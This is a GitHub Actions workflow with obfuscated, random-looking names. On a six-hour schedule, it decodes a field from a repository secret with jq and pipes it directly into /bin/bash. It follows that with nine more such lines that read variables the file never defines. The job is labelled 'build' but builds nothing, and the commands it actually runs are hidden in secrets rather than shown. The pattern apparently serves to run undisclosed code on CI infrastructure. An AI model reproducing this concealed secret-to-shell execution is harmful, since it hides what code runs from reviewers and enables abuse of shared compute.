name: lianglingxiao5432

on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lianglingxiao5432
        env:
          p4545: ${{ secrets.p4545 }}
        run: |
          echo $p4545 | jq -r .bhdd33 | /bin/bash
          echo $vq29 | jq -r .qwu1981 | /bin/bash
          echo $nwoe9176 | jq -r .to8213 | /bin/bash
          echo $vgu79660 | jq -r .u74 | /bin/bash
          echo $lwej3 | jq -r .sn67 | /bin/bash
          echo $zblaz6 | jq -r .thke6106 | /bin/bash
          echo $ta16866 | jq -r .vs335 | /bin/bash
          echo $xib3 | jq -r .ycq678 | /bin/bash
          echo $m384 | jq -r .ewqd5400 | /bin/bash
          echo $fp7773 | jq -r .uxx29 | /bin/bash

